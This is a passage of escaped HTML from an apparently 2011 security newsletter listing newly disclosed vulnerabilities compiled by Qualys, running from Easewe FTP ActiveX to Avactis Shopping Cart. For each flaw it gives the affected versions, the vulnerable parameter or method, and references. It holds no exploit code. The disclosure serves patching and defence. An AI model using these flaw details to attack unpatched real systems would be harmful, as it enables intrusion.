&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48385"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48385&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;br /&gt;
*************************************************************&lt;br /&gt;
&lt;br /&gt;
Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys&lt;br /&gt;
(&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.qualys.com/"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;www.qualys.com&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;)&lt;br /&gt;
&lt;br /&gt;
This list is compiled by Qualys ( &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.qualys.com/"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;www.qualys.com&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt; ) as part of that company's ongoing effort to ensure its vulnerability management web service tests for all known vulnerabilities that can be scanned. As of this week Qualys scans for 11531 unique vulnerabilities. For this special SANS community listing, Qualys also includes vulnerabilities that cannot be scanned remotely.&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.27.1 CVE: Not Available&lt;br /&gt;
Platform: Third Party Windows Apps&lt;br /&gt;
Title: Easewe FTP OCX ActiveX Control "EaseWeFtp.ocx" Multiple Insecure Method Vulnerabilities&lt;br /&gt;
Description: Easewe FTP OCX ActiveX control is an FTP ActiveX component that provides standard FTP features. The ActiveX control&lt;br /&gt;
("EaseWeFtp.ocx") is exposed to multiple insecure method issues. The "Execute()" and "Run()" methods allow the execution of an arbitrary program through the "FilePath" argument. The "CreateLocalFile()" method allows for the creation of an arbitrary empty file. The "CreateLocalFolder()" method allows for the creation of an arbitrary directory. The "DeleteLocalFile()" method allows for the deletion of an arbitrary file. Easewe FTP ActiveX control version 4.5.0.9 is vulnerable; other versions may also be affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/archive/1/518573"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/archive/1/518573&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.27.2 CVE: Not Available&lt;br /&gt;
Platform: Third Party Windows Apps&lt;br /&gt;
Title: xAurora "RSRC32.DLL" DLL Loading Arbitrary Code Execution&lt;br /&gt;
Description: xAurora is a web browser for Microsoft Windows. The application is exposed to an issue that lets attackers execute arbitrary code. The issue arises because the application searches for the "RSRC32.DLL" Dynamic Link Library file in the current working directory. The issue can be exploited by placing both a specially crafted library file and a file that is associated with the vulnerable application in an attacker controlled location. xAurora version 10.00 is affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48432/discuss"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48432/discuss&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.27.3 CVE: Not Available&lt;br /&gt;
Platform: Third Party Windows Apps&lt;br /&gt;
Title: FreeAmp ".pls" File Buffer Overflow&lt;br /&gt;
Description: FreeAmp is an MP3 player available for Microsoft Windows.&lt;br /&gt;
FreeAmp is exposed to a buffer overflow issue because it fails to perform adequate checks on user supplied input. Specifically, this issue occurs when opening a specially crafted ".pls" file. FreeAmp&lt;br /&gt;
2.0.7 is vulnerable; other versions may also be affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48433/discuss"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48433/discuss&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.27.4 CVE: Not Available&lt;br /&gt;
Platform: Third Party Windows Apps&lt;br /&gt;
Title: Winamp Multiple Remote Issues&lt;br /&gt;
Description: Nullsoft Winamp is a media player for Microsoft Windows.&lt;br /&gt;
Winamp is exposed to multiple memory corruption issues, multiple heap-based buffer overflow issues, and an integer overflow issue that affects the "nsvdec_vp6.dll" file when parsing screen dimensions. &lt;br /&gt;
Winamp 5.61 is vulnerable and other versions may also be affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48457/discuss"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48457/discuss&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.27.5 CVE: Not Available&lt;br /&gt;
Platform: Third Party Windows Apps&lt;br /&gt;
Title: MySQLDriverCS SQL Injection&lt;br /&gt;
Description: MySQLDriverCS is a .NET compliant MySQL driver. The application is exposed to an SQL injection issue because it fails to properly sanitize user-supplied input. Specifically, this issue occurs in the function "BindParameters()" in the class "DirectStatement" of the "Statement.cs" file. MySQLDriverCS 4.0.1 and all the previous versions which support the parameterized query mechanism are vulnerable.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/archive/1/518627"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/archive/1/518627&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.27.6 CVE: Not Available&lt;br /&gt;
Platform: Third Party Windows Apps&lt;br /&gt;
Title: Novell ZENworks Handheld Management "ZfHSrvr.exe" Service Directory Traversal&lt;br /&gt;
Description: Novell ZENworks Handheld Management is an application used to prevent stolen handheld devices from leaking sensitive information. The application is exposed to a directory traversal issue in the "ZfHSrvr.exe" service listening over port 2398 because it fails to sufficiently sanitize user-supplied input. ZENworks Handheld Management 7.0.2.61213 and prior are vulnerable.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/archive/1/518625"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/archive/1/518625&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.27.7 CVE: Not Available&lt;br /&gt;
Platform: Third Party Windows Apps&lt;br /&gt;
Title: CygniCon CyViewer ActiveX Control "SaveData()" Insecure Method Vulnerability&lt;br /&gt;
Description: CygniCon CyViewer is an ActiveX object viewer. CygniCon CyViewer ActiveX control is exposed to an issue caused by an insecure method. This issue occurs because the "SaveData()" method in the "CyViewer.ocx" file can be exploited to overwrite arbitrary files on the affected computer. Ashampoo 3D CAD Professional 3 3.0.1 is vulnerable; other versions may also be affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48483/discuss"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48483/discuss&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.27.8 CVE:&lt;br /&gt;
CVE-2011-0196,CVE-2011-0197,CVE-2011-0198,CVE-2011-0199,CVE-2011-0200,CVE-2011-0201,&lt;br /&gt;
CVE-2011-0202,CVE-2011-0203,CVE-2011-0204,CVE-2011-0205,CVE-2011-0206,CVE-2011-0207,&lt;br /&gt;
CVE-2011-0208,CVE-2011-0209,CVE-2011-0210,CVE-2011-0211,CVE-2011-0212,CVE-2011-0213,CVE-2011-1132&lt;br /&gt;
Platform: Mac Os&lt;br /&gt;
Title: Apple Mac OS X Multiple Vulnerabilities&lt;br /&gt;
Description: Apple Mac OS X is exposed to multiple security issues that have been addressed in Security Update 2011-004. The update addresses new issues that affect AirPort, App Store, ATS, Certificate Trust Policy, ColorSync, CoreFoundation, CoreGraphics, FTP Server, ImageIO, International Components for Unicode, MobileMe, QuickLook, QuickTime and servermgrd. Mac OS X versions prior to 10.6.8 are affected.&lt;br /&gt;
Ref:&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://lists.apple.com/archives/security-announce/2011/Jun/msg00000.html"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://lists.apple.com/archives/security-announce/2011/Jun/msg00000.html&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.27.9 CVE: CVE-2011-2199&lt;br /&gt;
Platform: BSD&lt;br /&gt;
Title: tftp-hpa FTP Server " utimeout" Option Remote Buffer Overflow&lt;br /&gt;
Description: tftp-hpa is an enhanced version of the BSD TFTP client and server. The application is exposed to a remote buffer overflow issue because it fails to perform adequate boundary checks on user-supplied data. This issue occurs when processing a request to set the "utimeout" option from clients. Versions prior to tftp-hpa 5.1 are vulnerable.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.pre-cert.de/advisories/PRE-SA-2011-05.txt"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.pre-cert.de/advisories/PRE-SA-2011-05.txt&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.27.10 CVE: Not Available&lt;br /&gt;
Platform: Novell&lt;br /&gt;
Title: Novell File Reporter "NFRAgent.exe" Security Bypass&lt;br /&gt;
Description: Novell File Reporter provides solutions for managing files on the system. The application is exposed to a security bypass issue. Specifically, "NFRAgent.exe" listening allows attackers to delete arbitrary files with SYSTEM privileges by sending a specially crafted string to the "PATH" value. Novell File Reporter 1.0.4.2 and prior are vulnerable; other versions may also be affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48468/discuss"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48468/discuss&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.27.11 CVE: CVE-2011-2193&lt;br /&gt;
Platform: Cross Platform&lt;br /&gt;
Title: Torque "job name" Argument Remote Buffer Overflow&lt;br /&gt;
Description: Torque (Tera-scale Open source Resource and Queue manager) is a resource manager. The application is exposed to a remote buffer overflow issue due to a failure to properly bounds check user-supplied input.&amp;nbsp; Specifically, the issue affects the "job name" argument.&lt;br /&gt;
Terascale Open-Source Resource and Queue Manager 2.x, 2.5.x, 3.x are affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48374/discuss"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48374/discuss&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.27.12 CVE: CVE-2011-0730&lt;br /&gt;
Platform: Cross Platform&lt;br /&gt;
Title: Rampart "util/rampart_timestamp_token.c" Remote Security Bypass&lt;br /&gt;
Description: Rampart is a security module for Axis2. The application is exposed to a remote security bypass issue. This issue occurs because the application fails to calculate the expiration time of the security token. This will allow attackers to use an expired token to gain access to Axis2. Rampart 1.3.0 is vulnerable and other versions may also be affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48386/discuss"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48386/discuss&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.27.13 CVE: Not Available&lt;br /&gt;
Platform: Cross Platform&lt;br /&gt;
Title: LibreOffice ".lwp" File Multiple Remote Stack Buffer Overflow Vulnerabilities&lt;br /&gt;
Description: LibreOffice is an open source suite for Windows, Macintosh and Linux that provides applications for document production and data processing. LibreOffice is exposed to multiple remote stack-based buffer overflow issues because it fails to perform adequate boundary checks on user-supplied input. Specifically, these issues occur while importing specially crafted Lotus Word Pro (".lwp") files because of an error in the import filters. LibreOffice 3.3.1 and&lt;br /&gt;
3.3.2 are vulnerable and prior versions may also be affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48387/discuss"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48387/discuss&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.27.14 CVE: CVE-2011-1956&lt;br /&gt;
Platform: Cross Platform&lt;br /&gt;
Title: Wireshark "bytes_repr_len()" NULL Pointer Dereference Denial of Service&lt;br /&gt;
Description: Wireshark (formerly Ethereal) is an application for analyzing network traffic. The application is exposed to a remote denial of service issue caused by a NULL pointer dereference error in the TCP dissector. Specifically, the issue occurs in the "bytes_repr_len()" function when handling malformed TCP packets.&lt;br /&gt;
Wireshark version 1.4.5 is vulnerable.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5837"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5837&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.27.15 CVE: CVE-2011-2192&lt;br /&gt;
Platform: Cross Platform&lt;br /&gt;
Title: cURL/libcURL GSS/Negotiate Feature Spoofing Security Vulnerability&lt;br /&gt;
Description: cURL is a utility for transferring files with URL syntax over a number of protocols. cURL/libcURL is exposed to an issue that may allow attackers to spoof the clients security credentials. This issue occurs because the application's GSS/Negotatie feature unconditionally performs credential delegation, which may allow attackers to gain access to the client's security credentials. This issue affects cURL/libcURL 7.10.6 through 7.21.6.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://curl.haxx.se/docs/adv_20110623.html"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://curl.haxx.se/docs/adv_20110623.html&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.27.16 CVE: CVE-2011-2535,CVE-2011-2529&lt;br /&gt;
Platform: Cross Platform&lt;br /&gt;
Title: Asterisk Multiple Remote Denial of Service Vulnerabilities&lt;br /&gt;
Description: Asterisk is an open-source PBX application available for multiple operating platforms. Asterisk is exposed multiple remote denial of service issues. Refer to reference for complete details.&lt;br /&gt;
Asterisk versions 1.4.x, 1.6.2.x and 1.8.x are affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://downloads.asterisk.org/pub/security/AST-2011-008.html"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://downloads.asterisk.org/pub/security/AST-2011-008.html&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://downloads.asterisk.org/pub/security/AST-2011-009.html"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://downloads.asterisk.org/pub/security/AST-2011-009.html&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://downloads.asterisk.org/pub/security/AST-2011-010.html"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://downloads.asterisk.org/pub/security/AST-2011-010.html&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.27.17 CVE: CVE-2011-2204&lt;br /&gt;
Platform: Cross Platform&lt;br /&gt;
Title: Apache Tomcat "MemoryUserDatabase" Information Disclosure&lt;br /&gt;
Description: Apache Tomcat is a Java-based webserver application for multiple operating systems. The application is exposed to a remote information disclosure issue. This issue is caused by an error when creating users through the JMX feature and using the "MemoryUser"&lt;br /&gt;
Database. This will allow attackers to gain access to user authentication credentials. Apache Tomcat versions 5.5.0 through 5.5.33, 6.0.0 through 6.0.32 and 7.0.0 through 7.0.16 are affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://tomcat.apache.org/security-5.html"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://tomcat.apache.org/security-5.html&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://tomcat.apache.org/security-6.html"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://tomcat.apache.org/security-6.html&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://tomcat.apache.org/security-7.html"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://tomcat.apache.org/security-7.html&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.27.18 CVE: CVE-2011-2533&lt;br /&gt;
Platform: Cross Platform&lt;br /&gt;
Title: D-Bus Configuration Insecure Temporary File Creation Vulnerability&lt;br /&gt;
Description: D-Bus is an IPC (Inter-Process Communication) system for applications to talk to one another. The application is exposed to an insecure temporary file creation issue which allows local users to overwrite arbitrary files via a symlink attack on an unspecified file in /tmp/. Versions prior to D-Bus 1.2.28 are vulnerable.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48460/discuss"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48460/discuss&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.27.19 CVE: Not Available&lt;br /&gt;
Platform: Cross Platform&lt;br /&gt;
Title: Sybase Advantage Server "ADS" Process Off-By-One Buffer Overflow&lt;br /&gt;
Description: Sybase Advantage Server is a relational database management application. Sybase Advantage Server is exposed to an off-by-one buffer overflow issue. This issue affects the "ADS" process when handling a malformed packet sent to TCP or UDP port 6262. Sybase Advantage Server 10.0.0.3 is vulnerable and other versions may also be affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48464/discuss"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48464/discuss&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.27.20 CVE:&lt;br /&gt;
CVE-2011-2351,CVE-2011-2350,CVE-2011-2349,CVE-2011-2348,CVE-2011-2347,CVE-2011-2346,CVE-2011-2345&lt;br /&gt;
Platform: Cross Platform&lt;br /&gt;
Title: Google Chrome Multiple Security Vulnerabilities&lt;br /&gt;
Description: Google Chrome is a web browser for multiple platforms.&amp;nbsp; The application is exposed to multiple security issues. An out-of-bounds read issue occurs when handling NPAPI strings. A use-after-free issue occurs in SVG font handling. A memory corruption issue occurs in CSS parsing.&amp;nbsp; Multiple issues occur with lifetime and re-entrancy in the HTML parser. An issue occurs with improper bounds checking v8 JavaScript engine. A use-after-free issue occurs when handling SVG use elements. A use-after-free issue occurs during text selection. Versions prior to Chrome 12.0.742.112 are vulnerable.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48479/discuss"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48479/discuss&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.27.21 CVE: Not Available&lt;br /&gt;
Platform: Web Application - SQL In jection&lt;br /&gt;
Title: IdevSpot iSupport "x_category" Parameter SQL Injection&lt;br /&gt;
Description: iSupport is a PHP-based application used for help desk and support ticketing. The application is exposed to an SQL injection issue because it fails to properly sanitize user-supplied input submitted to the "x_category" parameter of the "index.php" script.&lt;br /&gt;
iSupport versions 1.8 and prior are affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48402/discuss"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48402/discuss&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.27.22 CVE: Not Available&lt;br /&gt;
Platform: Web Application&lt;br /&gt;
Title: ActivDesk Multiple Cross-Site Scripting and SQL Injection Vulnerabilities&lt;br /&gt;
Description: ActivDesk is a web-based help desk application. ActivDesk exposed to Multiple SQL injection issues and a cross-site scripting issue that affects the "keywords" parameter of the "search.cgi" script.&lt;br /&gt;
ActivDesk version 3.0 is vulnerable and other versions may also be affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48409/discuss"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48409/discuss&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.27.23 CVE: Not Available&lt;br /&gt;
Platform: Web Application&lt;br /&gt;
Title: Nodesforum "3rd_party_limits.php" Remote File Include Vulnerability&lt;br /&gt;
Description: Nodesforum is a web-based application implemented in PHP.&lt;br /&gt;
The application is exposed to a remote file include issue because it fails to sufficiently sanitize user-supplied input submitted to the "_nodesforum_code_path" parameter of the "3rd_party_limits.php"&lt;br /&gt;
script. Nodesforum versions 1.059 and prior are vulnerable.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;&lt;a href="http://www.securityfocus.com/bid/48428/discuss"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48428/discuss&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.27.24 CVE: Not Available&lt;br /&gt;
Platform: Web Application&lt;br /&gt;
Title: Avactis Shopping Cart Security Bypass and HTML Injection Vulnerabilities&lt;br /&gt;
Description: Avactis Shopping Cart is a PHP-based shopping cart. The application is exposed to multiple issues. A security bypass issue due to an unspecified error allows attackers with administrative privileges to gain additional elevated privileges. An unspecified HTML injection issue exists because the application fails to properly validate user-supplied input.&amp;nbsp; Versions prior to Avactis Shopping Cart 2.1.1 are vulnerable.&lt;br /&gt;
